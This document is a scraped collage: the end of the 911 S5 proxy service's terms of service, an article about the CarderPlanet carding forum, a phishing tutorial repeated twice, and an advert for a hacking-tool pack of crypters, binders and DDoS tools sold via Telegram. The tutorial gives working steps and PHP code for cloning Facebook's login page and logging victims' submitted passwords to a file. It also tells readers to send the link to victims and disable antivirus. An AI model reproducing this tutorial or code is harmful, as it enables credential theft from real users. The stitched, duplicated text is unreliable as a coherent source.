rights to the System.2. User Information and AccountsUsers may be required to register on the Platform before accessing portions of the Platform. Your information will be collected and disclosed in accordance with our Privacy Policy. All users are required to provide truthful and accurate information when registering for our Platform and must be over the age of 18. Users may only register for one account per user. We reserve the right to verify all user credentials and to reject any users. You are entirely responsible for maintaining the confidentiality of your password and account and for any and all activities that occur under your account. You agree to notify 911 immediately of any unauthorized use of your account or any other breach of security. 911 will not be liable for any losses you incur as a result of someone else using your password or account, either with or without your knowledge. If you are registering on behalf of your company, you represent and warrant that you are authorized by your company to create an account on your company’s behalf and you represent and warrant that you are authorized by your company to incur financial obligations and enter into legally binding agreements on behalf of your company. 3. ServicesThrough the Platform, 911 may offer proxy services or other services. The services may be provided via the internet or via downloadable software. Where you have downloaded a copy of our software you agree to abide by the EULA in addition to this Agreement. 911 uses reasonable efforts to provide these services to you; however, all services provided depend on innumerable factors and variables that are outside of 911's direct control. For these reasons, all services offered are not guaranteed and are offered “as-is”. Where you decide to use any services offered by the Platform, you agree that we make no guarantees including but not limited to access or efficiency. You understand that the services offered may have variance, be inexact, cause negative effects, or be otherwise incorrect. You agree to release us from any liability that we may incur for providing you any services offered via Platform. You agree that any service or any other information found on the Platform may be inaccurate, unsubstantiated or possibly even incorrect. You agree to release us from any liability that we may have to in relation to your use of our Platform.4. User ContentYour ability to submit or transmit any information through the Platform, including but not limited to data, information, images, references, or any other information will be referred to as “User Content” throughout this Agreement. Please be aware that we are not required to host, display, migrate, or distribute any of your User Content and we may refuse to accept or transmit any User Content. You agree that you are solely responsible for any User Content submitted and you release us from any liability associated with any User Content submitted. We provide industry standard security for our Platform but we cannot guarantee the absolute safety and security of any such User Content. Any User Content found to be in violation of this Agreement or that we determine to be harmful to the Platform may be modified, edited, or removed at our discretion.When submitting any User Content to our Platform you represent and warrant that you own all rights to the User Content and you have paid for or otherwise have permission to use any User Content submitted. Furthermore, you represent and warrant that all User Content is legal and the User Content does not interfere with any third party rights or obligations.When you submit any User Content to us, you grant 911, its partners, affiliates, users, representatives and assigns a non-exclusive, limited, fully-paid, royalty-free, revocable, world-wide, universal, transferable, assignable license to display, distribute, store, broadcast, transmit, reproduce, modify, prepare derivative works, or use and reuse all or part of your User Content for the purposes of providing you any services associated with the Platform. Additionally, you grant to 911 a worldwide, perpetual, irrevocable, royalty-free license to use and incorporate into the Platform any suggestion, enhancement request, recommendation, correction or other feedback provided by you relating to the operation of our Platform.5. Privacy PolicyWe value your privacy and understand your privacy concerns. Our Privacy Policy is incorporated into this Agreement, and it governs your access to and use of the Platform. Please review our Privacy Policy so that you may understand our privacy practices. All information we collect is subject to our Privacy Policy, and by using the Platform you consent to all actions taken by us with respect to your information in compliance with the Privacy Policy. You further understand that any information collected by 911 may be transferred outside of your resident jurisdiction and/or other countries for storage, processing and use by 911 and its affiliates.6. Platform AvailabilityAlthough we try to provide continuous availability to you, we do not guarantee that the Platform will always be available, work, or be accessible at any particular time. Additionally, 911 is under no obligation to provide the services to any users and may suspend a user’s access to the Platform at any time and at our discretion. Only users who are eligible to use our Platform may do so and we may refuse service or terminate your access at any time. We cannot guarantee that anything found on our Platform will work to the functionality desired by you or give you any desired results.7. Modification of PlatformWe reserve the right to alter, modify, update, or remove our Platform at any time. We may conduct such modifications to our Platform for security reasons, intellectual property, legal reasons, or various other reasons at our discretion, and we are not required to explain such modifications. For example, we may provide updates to fix security flaws, or to respond to legal demands. Please note that this is a non-binding illustration of how we might exercise our rights under this section, and nothing in this section obligates us to take measures to update the Platform for security, legal or other purposes.8. Platform RestrictionsYou agree to abide by all restrictions set forth in our EULA when using and accessing our Platform.9. PaymentsPortions of the Platform or specific services offered may require payment and you agree to pay for all costs, fees, and taxes listed. User authorizes 911 or its third party payment processors to charge their method of payment at the time of purchase. Please be aware that purchases are completed via our third party payment processors. Where applicable, you must agree to our third party payment processors terms and conditions for processing payments. All information that you provide in connection with a purchase or transaction must be accurate, complete, and current. Where you have failed to pay or where payments are overdue, 911 may suspend or terminate your access to any services of the Platform, without liability to us.10. TaxesWhere 911 does not charge you taxes for any purchases, you agree to pay any and all applicable taxes for your use and purchase of the services. Additionally, where requested by us, you agree to provide us tax documentation to support any claims of on-time tax payment.11. Pricing and Price IncreasesThe pricing for any services is listed on 911 Platform. 911 may increase the price of any services, at our discretion and we reserve the right to do so at any time. In the event of a price increase, 911 shall notify you and you will have the chance to accept or reject any price increase. Please notify us if you intend to reject a price increase. Where you have rejected a price increase, you may be unable to access portions of the Platform. You agree that 911 has no obligation to offer any services for the price originally offered to you at sign up.12. RefundsAs we offer online services, we cannot offer refunds for any paid services. Please be aware that all payments are final.13. Crypto Currency PaymentsWhere you use any crypto currency to pay for any services, you are solely responsible for ensuring and verifying that such payments are deposited correctly. We cannot be responsible for any payments that are lost in transmission or paid more than the Order Amount or sent to incorrect wallet addresses. Additionally, you must verify that all payments are fully paid for before the expiration of your order and that you have paid the correct amount for any services. We will not be able to refund any crypto currency payments and you are solely responsible for verifying any crypto payment amounts.14. Intellectual PropertyThe name “911 S5”, 911.gg, 911.re, the 911 Platform along with the design of 911 Platform and any text, writings, images, templates, scripts, graphics, interactive features and any trademarks or logos contained therein ("Marks"), are owned by or licensed to 911, subject to copyright and other intellectual property rights under international laws and international conventions. 911 reserves all rights not expressly granted in and to the Platform. You agree to not engage in the use, copying, or distribution anything contained within the Platform unless we have given express written permission.15. Idea Submission911 or any of its employees do not accept or consider unsolicited ideas, including but not limited to ideas relating to processes, technologies, product enhancements, or product names. Please do not submit any unsolicited ideas, content, artwork, suggestions, or other works (“Submissions”) in any form to 911. The sole purpose of this policy is to avoid potential misunderstandings or disputes when 911’s products or services might seem similar to ideas you submitted to 911. If, despite our request that you not send us your ideas, you agree to the following: (1) your Submissions and their contents will automatically become the property of 911, without any compensation to you; (2) 911 may use or redistribute the Submissions and their contents for any purpose and in any way; (3) there is no obligation for 911 to review the Submission; and (4) there is no obligation to keep any Submissions confidential.16. DisclaimerTHE PLATFORM AND ALL SERVICES ARE PROVIDED ON AN "AS IS", "AS AVAILABLE" AND "WITH ALL FAULTS" BASIS. TO THE FULLEST EXTENT PERMISSIBLE BY LAW, NEITHER 911, NOR ANY OF OUR EMPLOYEES, MANAGERS, OFFICERS, ASSIGNS OR AGENTS MAKE ANY REPRESENTATIONS OR WARRANTIES OR ENDORSEMENTS OF ANY KIND WHATSOEVER, EXPRESS OR IMPLIED, AS TO: (1) THE PLATFORM; (2) ANY INFORMATION PROVIDED VIA THE PLATFORM; (3) THE SERVICES, OR (4) SECURITY ASSOCIATED WITH THE TRANSMISSION OF INFORMATION TO 911, OR VIA THE PLATFORM. IN ADDITION, WE DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, LOST PROFITS, NON-INFRINGEMENT, TITLE, CUSTOM, TRADE, QUIET ENJOYMENT, SYSTEM INTEGRATION AND FREEDOM FROM COMPUTER VIRUS.911 DOES NOT REPRESENT OR WARRANT THAT THE PLATFORM INCLUDING THE SERVICES WILL BE ERROR-FREE OR UNINTERRUPTED; THAT DEFECTS WILL BE CORRECTED; OR THAT THE PLATFORM OR THE SERVER THAT MAKES THE PLATFORM AVAILABLE IS FREE FROM ANY HARMFUL COMPONENTS. 911 DOES NOT MAKE ANY REPRESENTATIONS OR WARRANTIES THAT THE SERVICES OFFERED ARE ACCURATE, COMPLETE, OR USEFUL. 911 DOES NOT WARRANT THAT YOUR USE OF THE PLATFORM IS LAWFUL IN ANY PARTICULAR JURISDICTION, AND 911 SPECIFICALLY DISCLAIMS ANY SUCH WARRANTIES.17. Limitation of LiabilityIN NO EVENT SHALL 911, ITS OFFICERS, DIRECTORS, EMPLOYEES, OR AGENTS, BE LIABLE TO YOU FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT 911 IS ADVISED OF THE POSSIBILITY OF SUCH DAMAGES, RESULTING FROM (1) YOUR USE OR INABILITY TO USE THE PLATFORM OR ANY ERRORS, MISTAKES, OR INACCURACIES FOUND WITHIN THE PLATFORM, (2) ANY PERSONAL INJURY OR PROPERTY DAMAGE, OF ANY NATURE WHATSOEVER, RESULTING FROM YOUR ACCESS TO AND USE OF OUR PLATFORM INCLUDING THE SERVICES, (3) ANY INTERRUPTION, MISINFORMATION, INCOMPLETE INFORMATION, OR CESSATION OF TRANSMISSION TO OR FROM OUR PLATFORM TO YOU, (4) ANY BUGS, VIRUSES, TROJAN HORSES, OR THE LIKE, WHICH MAY BE TRANSMITTED TO OR THROUGH OUR PLATFORM VIA A THIRD PARTY, (5) ANY FAILURE OR DISRUPTION OF SERVICES WHETHER INTENTIONAL OR UNINTENTIONAL, OR (6) ANY ACTION TAKEN IN CONNECTION WITH ANY THIRD PARTY COPYRIGHT OR OTHER INTELLECTUAL PROPERTY OWNERS. THE FOREGOING LIMITATION OF LIABILITY SHALL APPLY TO THE FULLEST EXTENT PERMITTED BY LAW IN THE APPLICABLE JURISDICTION. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OR EXCLUSION OF LIABILITY FOR INCIDENTAL OF CONSEQUENTIAL DAMAGES, SO THE ABOVE LIMITATION OR EXCLUSION MAY NOT APPLY TO YOU. SPECIFICALLY, IN THOSE JURISDICTIONS NOT ALLOWED, WE DO NOT DISCLAIM LIABILITY FOR: (1) DEATH OR PERSONAL INJURY CAUSED BY 911’S NEGLIGENCE OR THAT OF ANY OF ITS OFFICERS, EMPLOYEES OR AGENTS; (2) FRAUDULENT MISREPRESENTATION; OR (3) ANY LIABILITY WHICH IT IS NOT LAWFUL TO EXCLUDE EITHER NOW OR IN THE FUTURE. WHERE A TOTAL DISCLAIMER OF LIABILITY IS DISALLOWED YOU AGREE THAT OUR TOTAL LIABILITY TO YOU SHALL NOT EXCEED THE AMOUNTS YOU HAVE PAID IN THE PAST ONE (1) MONTH TO USE OUR PLATFORM INCLUDING OUR SERVICES.18. IndemnityYou agree to defend, indemnify and hold harmless 911, its officers, directors, employees and agents, from and against any and all claims, damages, obligations, losses, liabilities, costs or debt, and expenses (including but not limited to attorney's fees) arising from:• your use of and access to 911 Platform including any services;• your violation of any term of this Agreement;• your interactions with any other uses or third parties; or• your violation of any third party right, including without limitation any copyright, property, or contractual right.This defense and indemnification obligation will survive this Agreement and your use of 911 Platform. You also agree that you have a duty to defend us against such claims and we may require you to pay for an attorney(s) of our choice in such cases. You agree that this indemnity extends to requiring you to pay for our reasonable attorneys’ fees, court costs, and disbursements. In the event of a claim such as one described in this paragraph, we may elect to settle with the party/parties making the claim and you shall be liable for the damages as though we had proceeded with a trial.19. Counter NoticeIn the event that you receive a notification from 911 stating content posted by you has been taken down, you may respond by filing a counter-notice. Your counter-notice must contain the following:• Your name, address, email and physical or electronic signature.• The notification reference number (if applicable).• Identification of the material and its location before it was removed.• A statement under penalty of perjury that the material was removed by mistake or misidentification.• Your consent to US federal court jurisdiction.• Your consent to accept service of process from the party who submitted the takedown notice.Please be aware that we may not take any action regarding your counter-notice unless your notification strictly complies with the foregoing requirements. Please send this counter-notice in accordance with the takedown notice instructions above.20. Choice of LawThis Agreement shall be governed by the laws in force in the British Virgin Islands. The offer and acceptance of this contract is deemed to have occurred in the British Virgin Islands.21. DisputesAny dispute, controversy, or claim arising out of, or relating to, or in connection with this Agreement, including with respect to the formation, applicability, breach, termination, invalidity, enforceability or any dispute regarding non-contractual obligations arising out of or relating to such obligations shall be submitted to confidential arbitration at the BVW International Arbitration Centre located within the British Virgin Islands. The arbitration shall be conducted under BVI IAC Arbitration Rules (“Rules”) (in force at the time of submission of a Notice of Arbitration and as may be amended from time to time). One arbitrator shall be agreed upon by the parties, and where the parties cannot come to an agreement, an arbitrator shall be selected pursuant to the Rules. Arbitration shall be conducted in English and the arbitrator's award shall be final and binding and may be entered as a judgment in any court of competent jurisdiction. Each party shall be responsible for their own arbitration fees and costs. To the fullest extent permitted by applicable law, no arbitration under this Agreement shall be joined to an arbitration involving any other party subject to this Agreement, whether through class action proceedings or otherwise. Where allowed by the Rules, 911 may make any and all appearances telephonically or electronically. You agree that regardless of any statute or law to the contrary, any claim or cause of action arising out of, related to or connected with the use of the Platform or this Agreement must be filed within one (1) year after such claim or cause of action arose or be forever banned. Notwithstanding the foregoing, either party may seek equitable relief to protect its interests (including but not limited to injunctive relief), or make a claim for nonpayment, in a court of appropriate jurisdiction, and issues of intellectual property ownership or infringement may be decided only by a court of appropriate jurisdiction and not by arbitration. In the event that the law does not permit the above mentioned dispute to be resolved through arbitration or if this arbitration agreement is unenforceable, you agree that any actions and disputes shall be brought solely in a court of competent jurisdiction located within Tortola, British Virgin Islands.22. Class Action WaiverYou and 911 agree that any proceedings to resolve or litigate any dispute whether through a court of law or arbitration shall be solely conducted on an individual basis. You agree that you will not seek to have any dispute heard as a class action, representative action, collective action, or private attorney general action.23. SeverabilityIn the event that a provision of this Agreement is found to be unlawful, conflicting with another provision of the Agreement, or otherwise unenforceable, the Agreement will remain in force as though it had been entered into without that unenforceable provision being included in it.If two or more provisions of this Agreement or any other agreement you may have with 911 are deemed to conflict with each other’s operation, 911 shall have the sole right to elect which provision remains in force.24. Non-WaiverWe reserve all rights permitted to us under this Agreement as well as under the provisions of any applicable law. Our non-enforcement of any particular provision or provisions of this Agreement or the any applicable law should not be construed as our waiver of the right to enforce that same provision under the same or different circumstances at any time in the future.25. Assignment and SurvivalYou may not assign your rights and/or obligations under this Agreement to any other party without our prior written consent. We may assign our rights and/or obligations under this Agreement to any other party at our discretion. All portions of this Agreement that would reasonably be believed to survive termination shall survive and remain in full force upon termination, including but not limited to the Limitation of Liabilities, Representation and Warranties, Licensing, Indemnification, and Arbitration sections.26. TerminationYou may cancel your Paid Subscription or your account at any time via your 911 dashboard or contacting us at sp[@]911 dot re. Any refunds are subject to the refund terms contained in this Agreement. Please be aware that upon termination of your account, access to portions of our Platform may be become immediately disabled. We may terminate this Agreement with you if we determine that: (1) you have violated any applicable laws while using our Platform; (2) if you have violated this Agreement or as permitted by the Platform; or (3) if we believe that any of your actions may legally harm 911 or our business interests, at our sole decision or discretion. In the event of termination, we will strive to provide you with a timely explanation; however, we are not required to do so.27. Entire AgreementThis Agreement along with the EULA AND Privacy Policy constitute the complete and exclusive understanding and agreement between the parties regarding the subject matter herein and supersede all prior or contemporaneous agreements or understandings written or oral, relating to its subject matter. Any waiver, modification or amendment of any provision of this Agreement will be effective only if in writing and signed by a duly authorized representative of each party.28. AmendmentsWe may amend this Agreement from time to time. When we amend this Agreement, we will update this page and indicate the date that it was last modified or we may email you. You may refuse to agree to the amendments, but if you do, you must immediately cease using our Platform and our Platform.29. Electronic CommunicationsThe communications between you and 911 use electronic means, whether you visit the Platform or send 911 e-mails, or whether 911 posts notices on the Platform or communications with you via mobile notifications or e-mail. For contractual purposes, you (1) consent to receive communications from 911 in an electronic form; and (2) agree that all terms, conditions, agreements, notices, disclosures, and other communications that 911 provides to you electronically satisfy any legal requirement that such communications would satisfy if it were to be in writing. The foregoing does not affect your statutory rights.30. Relationship of the Parties.The parties are independent contractors. This Agreement does not create a partnership, franchise, joint venture, agency, fiduciary or employment relationship between you and 911.31. Anti-AbuseYou agree to abide by our anti-abuse policies as listed at: https://911.re/antiIf you become aware that any user is abusing our services please contact us at abusereport@911.re32. Third-Party ContentWe do not control, and we are not responsible for, any data, content, services, or products (including software) that you access, download, receive or buy while using the Platform. We may, but do not have any obligation to, block information, transmissions or access to certain information, services, products or domains to protect the Platform, our network, the public or our users. We are not a publisher of third-party content accessed through the Platform and are not responsible for the content, accuracy, timeliness or delivery of any opinions, advice, statements, messages, services, graphics, data or any other information provided to or by third parties as accessible through the Platform.33. Geographical AccessThe Platform are not geographically limited; however, we make no representations or warranties that the Platform are appropriate for use or access in your location and jurisdiction. You access and use the Platform in your country on your own initiative and you solely are responsible for complying with your local laws and regulations, if and to the extent such laws are applicable. We reserve the right to limit, in our sole discretion, the availability of the Platform or any portion thereof, to any person, entity, geographic area, or jurisdiction, at any time.34. Platform Issues and SupportWhere you have any questions, issues, or if you are having trouble accessing or using the Platform, please contact us at sp@911.re.
  9. US intelligence agencies often catch "Russian" hackers and carders.A young man was slowly sipping a cocktail at nice airport, leaving after a rough rest, when a special forces squad burst into the waiting room.In the hacker world, Khorokhorin is better known under the pseudonym BadB.American government agencies called CarderPlanet perhaps the most dangerous community of cybercriminals."I broke the Israeli army"How does the carder business work? You can steal Bank card information in completely different ways: copy it in a restaurant when paying an invoice, convince the user to enter data on a fake website, hack into the database of a Bank or large retailer, or install a reader at an ATM. Such databases can be resold, and not necessarily resold by hackers themselves. Sometimes sales channels are searched for by intermediaries. This is partly why hacker forums are needed, where you can find potential buyers.One of these intermediaries, Dmitry Golubov, was met in 1998 by Vladislav Khorokhorin, who needed real Bank card details to access a porn site. "In practice, Dima could not hack anything more serious than his parents' dresser. He couldn't even install Windows properly. His real talent was organizing people, haggling and bartering", says Khorokhorin about Golubov.Prior to this incident, khorokhorin was almost not engaged in carding: he stole ICQ numbers, hacked Internet service providers, and even managed to serve time in an Israeli prison, where he moved with his mother from Donetsk. "I broke the Israeli army. After serving time and being kicked out of the service with a Bang, I then broke the Israeli Bank Discount, " says Khorokhorin. Then he was about 20 years old. Carding has become a new passion for Khorokhorin. He was increasingly sitting on the forum Carder.org where he also invited Golubov.As Khorokhorin recalls, Golubov immediately decided to make money and placed an ad for the sale of credit cards, or "cardboard", as they were called in the crowd. However, almost immediately he was kicked out for such an ad. "It was allowed to place an ad for sale if you yourself directly stole the goods being sold," explains Khorokhorin. According to him, Golubov immediately decided to open his own forum Carder.ru which would be an alternative Carder.org. For the position of administrator and web designer, he called his new friend Khorokhorin-BadB. The forum became popular almost immediately.However, the new forum did not last long: the site received many complaints, and it was closed. But its creators immediately registered three new domains: Carderplanet.com, Carderplanet.net and Carderplanet.org. So, in 2001, the history of the forum began, which the us intelligence agencies would later call "the most dangerous cybercrime organization."From "watching" to "Dony"The new site was rapidly gaining popularity: there you could chat with like-minded people, read training articles, ask for advice, negotiate a deal or get an order. The forum was run by administrators, the most important of whom called themselves dons in the spirit of the Sicilian mafia, and all together they were "family". However, initially the creators of the forum were closer to the Russian criminal romance: they called themselves virtual "thieves in law" and "watchers", but this was quickly abandoned. "We are also not far from the criminal world of the CIS.The Carderplanet forum gradually began to attract not only carders, but also representatives of other cybercrime spheres. And sometimes even people who are far from hacking at all. So, one of the donovs on the forum was Roman VEGA: he had his own project Boa Factory, which not only sold credit cards, but could also make passports of other countries by order."The procedure with the registration of European and American passports was simple: the customer sent photos via "soap" to .jpg, their requirements for the passport of a particular country and their (desired) data, and after some time (usually several weeks) received by mail, to the address specified when ordering, the finished passport. If desired-with a handful of stamps of entry and exit from different countries-so that the passport does not look new," says the source of Forbes, familiar with VEGA.VEGA found out about the carder forum almost by accident: a partner told him about CarderPlanet, to whom VEGA complained about frequent hacker attacks on the systems of his companies. VEGA quickly got used to the new environment, and in mid-2002, he became almost the main character at the forum participants ' meeting, which the creators of CarderPlanet decided to hold in Odessa. Why do hackers need a conference? At that time, professional conferences of cybersecurity specialists were being held in the United States, and carders wanted to make an analog. Vladislav Khorokhorin"Top managers" of the forum tried to control transactions and life on the forum. According to Khorokhorin, everyone had to obey "universal" moral values: "don't piss", "don't rat", "respect the hierarchy", "don't shit where you live". Although it was not possible to completely avoid conflicts. "Showdowns were constant, like any other business, especially criminal, here the struggle for spheres of influence is inevitable. And people were often caught. No one, of course, died, not animals, but sometimes they were hit hard", says Khorokhorin.VEGA's cooperation with CarderPlanet ended quickly enough, and in February 2003, he was arrested in Nicosia. As VEGA himself told Forbes, local police and Interpol officers detained him in a music store while he was choosing a CD. At the same time, the Castelli hotel, where VEGA lived, was raided: there the police found another hacker, Liratto, and three laptops. "These computers were also attributed to me. Liratto spent 9 months in Cyprus and went to Ukraine. I have nothing to do with it. He's a good person, " VEGA sums up.
  10. How To Make A Phishing Page Of Any Websites | Full Tutorial I sell scampage and letters already made telegram @krrrbaw Hi readers ,From now onward we’ll learn serious hacking and today I’m going to discuss about a well known hacking method that’s called phishing.Most of internet users aware of that but I told you guys this site is for newbies and that’s why I’m trying to teach you guys from the beginning .In this tutorial you guys will come to know details about phishing , how it works , how to make a phishing page and total 34 phishing page completely free !Well, let’s get startedWhat is phishing?Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to fool users,and exploits the poor usability of current web security technologies. In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.How to make any kind of phishing page ?Many of you may use software to make a phishing page but today I’ll show you guys something behind software and how you can make a phishing page by yourself .Well, to make any complete phishing package we need to make the following things : Phishing pagePHP scriptLog in file Make A Phishing Page : Step 1: Go to the website that you want to make a phishing page .Hence I’ll show you how to make a phishing page of facebook So, go to the official website of facebook www.facebook.com . Step 2: Now, click on the right button of your mouse and click view page source . You’ll be able to see a page like the picture below . Step 3: Copy the whole page and paste it into Notepad . (To open the Notepad go to Start >All programs >Accessories >Notepad ) Step 4: Now Press ” Ctrl+F ” and and click Find Next to search for “action” word .You’ll find total 3 “action” but choose the one that is after the “login_form” word.See the picture below to understand it properly.Thats the orignal source code of facebook login page and when we login our action is sent to the url written next to the highlighted portion. Step 5 : Now replace the Url after action word (https://www.facebook.com/login.php?login_attempt=1) with your exploit. I have given this exploit with the name of funsofts.php in the download package.[On my next post I'll provide download package] So, it will become as below : Step 6 : Now save as1.Give the File name - index.html2.Select Save as type - All Files3. Select Encoding - Unicode4.Click Save button to save the file.See the picture below to get it properly.You already made a fake log in (phishing page) page Now, you have to make a PHP scrips .Follow step by step and you’ll be done Make A PHP Scripts : Step 1: Open your Notepad Step 2: Copy and paste the code given below .<?phpheader (‘Location: http://www.facebook.com/’);$handle = fopen(“log.txt”, “a”);foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>Note : At the second line of code you see header (‘Location:http://www.facebook.com/’) .Here, we are making a facebook phishing page that’s why I provide the official URL of facebook but if you wanna make phishing page for some other page then you should give the official URL of that website.Ex : If you want to make a phishing page of yahoo mail then it would be like thisheader (‘Location:https://login.yahoo.com/’)Hope, I made you clear Step 3 :Now Save as 1.Give the File name - funsofts.php2.Select Save as type - All Files3. Select Encoding - Unicode4.Click Save button to save the file.Make A Text File :1.Just right click on your mouse and go to New>Text document .You will see a new text file will be appear .Give it a name like log .Well done You successfully made the phishing package .Now whatever you have to do just upload the all three file [Phishing page, PHP scripts, Text (log) file ] to any website that support PHP and send the link to your victim and convince him/her to log in your fake log in page .When your victim will log in to your fake log in page you’ll get the password and email address at your log.txt file .Here are some websites name there you can upload your phishing page :1.<<www.my3gbcom>>2.<<www.box.net>>May be you know this trick before but always remember one thing .“A old trick is may be a new trick for someone who didn’t know that before ”That’s why it was essential to provide the whole tutorial for newbies Now you’ll be able to hack any Facebook account , Yahoo mail, Gmail , Twitter account or anything you want by phishing method.Here are 37 phishing pages for 37 websites .You can download this package if you want .May be your antivirus will detect it as a virus cause many anti-viruses detect phishing page as a virus.You may can turn off your anti-virus before download it or if you don’t trust me than I recommend you to don’t download this package .
  11. How To Make A Phishing Page Of Any Websites | Full Tutorial Hi readers ,From now onward we’ll learn serious hacking and today I’m going to discuss about a well known hacking method that’s called phishing.Most of internet users aware of that but I told you guys this site is for newbies and that’s why I’m trying to teach you guys from the beginning .In this tutorial you guys will come to know details about phishing , how it works , how to make a phishing page and total 34 phishing page completely free !Well, let’s get startedWhat is phishing?Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to fool users,and exploits the poor usability of current web security technologies. In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.How to make any kind of phishing page ?Many of you may use software to make a phishing page but today I’ll show you guys something behind software and how you can make a phishing page by yourself .Well, to make any complete phishing package we need to make the following things : Phishing pagePHP scriptLog in file Make A Phishing Page : Step 1: Go to the website that you want to make a phishing page .Hence I’ll show you how to make a phishing page of facebook So, go to the official website of facebook www.facebook.com . Step 2: Now, click on the right button of your mouse and click view page source . You’ll be able to see a page like the picture below . Step 3: Copy the whole page and paste it into Notepad . (To open the Notepad go to Start >All programs >Accessories >Notepad ) Step 4: Now Press ” Ctrl+F ” and and click Find Next to search for “action” word .You’ll find total 3 “action” but choose the one that is after the “login_form” word.See the picture below to understand it properly.Thats the orignal source code of facebook login page and when we login our action is sent to the url written next to the highlighted portion. Step 5 : Now replace the Url after action word (https://www.facebook.com/login.php?login_attempt=1) with your exploit. I have given this exploit with the name of funsofts.php in the download package.[On my next post I'll provide download package] So, it will become as below : Step 6 : Now save as1.Give the File name - index.html2.Select Save as type - All Files3. Select Encoding - Unicode4.Click Save button to save the file.See the picture below to get it properly.You already made a fake log in (phishing page) page Now, you have to make a PHP scrips .Follow step by step and you’ll be done Make A PHP Scripts : Step 1: Open your Notepad Step 2: Copy and paste the code given below .<?phpheader (‘Location: http://www.facebook.com/’);$handle = fopen(“log.txt”, “a”);foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>Note : At the second line of code you see header (‘Location:http://www.facebook.com/’) .Here, we are making a facebook phishing page that’s why I provide the official URL of facebook but if you wanna make phishing page for some other page then you should give the official URL of that website.Ex : If you want to make a phishing page of yahoo mail then it would be like thisheader (‘Location:https://login.yahoo.com/’)Hope, I made you clear Step 3 :Now Save as 1.Give the File name - funsofts.php2.Select Save as type - All Files3. Select Encoding - Unicode4.Click Save button to save the file.Make A Text File :1.Just right click on your mouse and go to New>Text document .You will see a new text file will be appear .Give it a name like log .Well done You successfully made the phishing package .Now whatever you have to do just upload the all three file [Phishing page, PHP scripts, Text (log) file ] to any website that support PHP and send the link to your victim and convince him/her to log in your fake log in page .When your victim will log in to your fake log in page you’ll get the password and email address at your log.txt file .Here are some websites name there you can upload your phishing page :1.<<www.my3gbcom>>2.<<www.box.net>>May be you know this trick before but always remember one thing .“A old trick is may be a new trick for someone who didn’t know that before ”That’s why it was essential to provide the whole tutorial for newbies Now you’ll be able to hack any Facebook account , Yahoo mail, Gmail , Twitter account or anything you want by phishing method.Here are 37 phishing pages for 37 websites .You can download this package if you want .May be your antivirus will detect it as a virus cause many anti-viruses detect phishing page as a virus.You may can turn off your anti-virus before download it or if you don’t trust me than I recommend you to don’t download this package .
  12. Ultimate Hacking Tools Pack (400+ Tools) I sell my hacking pack with over 400 hacking software -I have checked and all software is up to date and still working -interested sent a private message or contacted on the @krrrbaw telegram here is a list of all the software in the pack Includes: Binders (23): amokjoiner Bl0b B!nder 0.2.0 + USG blackhole Binder F.B.I. Binder Predator 1.6 PureBiND3R by d3will Schniedelwutz Binder 1.0 Simple Binder by Stonedinfect sp1r1tus Binder 1.0 Tool-Store Binder 1.0 Tool-Store Toasty Binder 1.0 Yet Another Binder 2.0 Albertino_Binder bl0b_bind EESBinder10 Kbw-Binder Public_27.12 Rapid_Binder_v_1.0 Sadaf_Binder SaLiXeM_File_Binder Sh!T_Multi_Binder_Free- vBinder yab201 --------------------------------------------------------------------- Cracking Tools (16): Access Driver Ares Attack Toolkit v4.1 & source code included Brutus Golden eye 2005 HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Net Tools Suite Pack Abril NFO-Tools All In One Patchs All In One 2005 Sentry20 SoftIce 4.05 -Win 2000-XP VNC Crack WWWHack --------------------------------------------------------------------- Crypters (24): Bifrost Crypter by ArexX 2 Cryptable Seduction 1.0 by DizzY Crypter by Permabatt Crypter bY YoDa Cryptic 1.5 Daemon Crypt 2 Public Deception 4 by [RaGe] Destructor Crypter EXECrypt 1 M0d by CARDX Fuzz Buzz 1.2 by BulletProof OSC-Crypter by haZl0oh M0d Poison Ivy Crypt M0d by CARDX SaW V1 Mod by LEGIONPR Skorpien007 Crypter 3.1 Stonedinfect Crypter 1.0 Trojka Crypter 1.1 by tr1p0d Builder Carb0n_Crypter_1.8 Sick Crypter Sikandar's_Crypter_Version_1.0_Public Simple+Crypter Test1 Triloko_Crypter XxVtecman9xX_Crypter --------------------------------------------------------------------- DDosers (53): assault_1.0 click_2.2 crazyping_1.1 death_n_destruction donut_http_flooder_1.4 fed_up_2.0 firewall_killer_1.3 igmp_nuke_1.0 illusion DOS krate_port_bomber meliksah_nuke_2.5 nemesy_1.3 NetBot_Attacker 1.4 English panther_2.0 spoofed_irc_nuker_1.3 ~FuCk_It!~_DOS ass4ult b4ttl3p0ng bd0rk's DoS Killer BFF_DoS_(Ping)_v1.0 BioHazard clik2 CS_DoS DDOS denden_ddos DoS 5.5 Fina Cold_Assassin69l Dos Attacker Alpha 1.1 doshttp_setup fortune FUBAR Hartz4Flooder_v0.2. IFRAME_DDoS_v1.0 iGirls_DoS_Tool IP Port Ddos IRAN DoS Longcat_TCP_HTTP_UDP_Flooder_v2.3_Final MegaDeath PM2 Private_ddos_tool_by_pureedee_v3.0 rDos RocketV1_0 rpcnuke ServerAttack Site_Hog_v1_release SMFH_DOS SuPeRdDoS_1.0 Supernova 5 SYN-flood t3c4i3_s_Dos_Tool_v2.00 